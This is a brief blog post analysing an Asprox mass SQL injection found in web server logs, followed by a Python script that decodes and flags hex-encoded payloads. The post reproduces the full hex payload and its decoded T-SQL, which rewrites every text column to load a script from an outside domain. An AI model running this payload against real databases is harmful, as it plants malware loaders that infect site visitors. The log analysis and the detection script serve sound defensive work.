Hex value SQL injection attack.
I just found some errors that looked a little strange. It was obviously a SQL injection attack but I couldn’t tell what it was. After the normal parameters I found this:
| ;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C41524520405420564152434841522832 3535292C4043205641524348415228323 53529204445434C415245205461626C655F437572736F7 220435552534F5220464F522053454C4543 5420612E6E616D652C622E6E616D652046524F4D2073 79736F626A6563747320612C737973636F6C75 6D6E73206220574845524520612E69643D622E696 420414E4420612E78747970653D27752720414E 442028622E78747970653D3939204F5220622E787 47970653D3335204F5220622E78747970653D323 331204F5220622E78747970653D31363729204F5 0454E205461626C655F437572736F72204645544 348204E4558542046524F4D205461626C655F437 572736F7220494E544F2040542C4043205748494 C4528404046455443485F5354415455533D30292 0424547494E20455845432827555044415445205 B272B40542B275D20534554205B272B40432B275 D3D525452494D28434F4E5645525428564152434 841522834303030292C5B272B40432B275D29292 B27273C736372697074207372633D687474703A2 F2F7777772E6E6362772E72752F6A732E6A733E3C 2F7363726970743E27272729204645544348204E4 558542046524F4D205461626C655F437572736F7 220494E544F2040542C404320454E4420434C4F53 45205461626C655F4 37572736F72204445414C4C 4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S); |
With a little help from:
http://isc.sans.org/diary.html?storyid=4565 and http://www.eggheadcafe.com/software/aspnet/32646085/sql-injection-gibberish.aspx
I learned that this was hex code that translated to:
| DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src="http://wwwDOTncbwDOTru/jsDOTjs"></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor |
More and better info can be found at http://www.dynamoo.com/blog/labels/SQL%20Injection.html
This is called Asprox.
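The decoding step described above can be automated when triaging web logs. The following is an added example, not part of the original post: it finds `CAST(0x… AS VARCHAR)` in a logged request, decodes the hex, and flags strings that appear in the decoded payload. The function name, the indicator list and the sample log line are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS VARCHAR|NVARCHAR ...). Tolerates whitespace inside the hex run
# and a typographic "×" for "x", both of which publishing software can introduce.
CAST_HEX = re.compile(r"CAST\s*\(\s*0[x×]([0-9A-F\s]+?)\s+AS\s+N?VARCHAR", re.I)

# Strings worth flagging in decoded SQL; all occur in the decoded payload above.
INDICATORS = ("sysobjects", "syscolumns", "CURSOR", "EXEC(", "UPDATE", "<script")


def decode_cast_hex(request_text):
    """Return [(decoded_sql, matched_indicators), ...] for each hex CAST found."""
    text = unquote_plus(request_text)      # web logs store the query URL-encoded
    findings = []
    for match in CAST_HEX.finditer(text):
        hex_run = re.sub(r"\s+", "", match.group(1))
        if len(hex_run) % 2:               # fromhex() needs an even digit count
            hex_run = "0" + hex_run
        raw = bytes.fromhex(hex_run)
        # NVARCHAR payloads are UTF-16LE, so the second byte of ASCII text is NUL.
        encoding = "utf-16-le" if len(raw) > 1 and raw[1] == 0 else "latin-1"
        sql = raw.decode(encoding, errors="replace")
        hits = [i for i in INDICATORS if i.lower() in sql.lower()]
        findings.append((sql, hits))
    return findings


# Constructed sample, not the payload from this page: a harmless statement,
# hex-encoded and delivered the same way as the logged request.
SAMPLE_SQL = "DECLARE @T VARCHAR(255) SELECT name FROM sysobjects"
SAMPLE_LOG = (
    "GET /page.asp?id=5;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_SQL.encode("ascii").hex().upper()
    + "%20AS%20VARCHAR(4000));EXEC(@S);"
)

if __name__ == "__main__":
    for sql, hits in decode_cast_hex(SAMPLE_LOG):
        print("indicators:", hits)
        print("decoded:   ", sql)
```

Any request that yields a non-empty result deserves a look, since ordinary page parameters have no reason to carry a hex-encoded `CAST`.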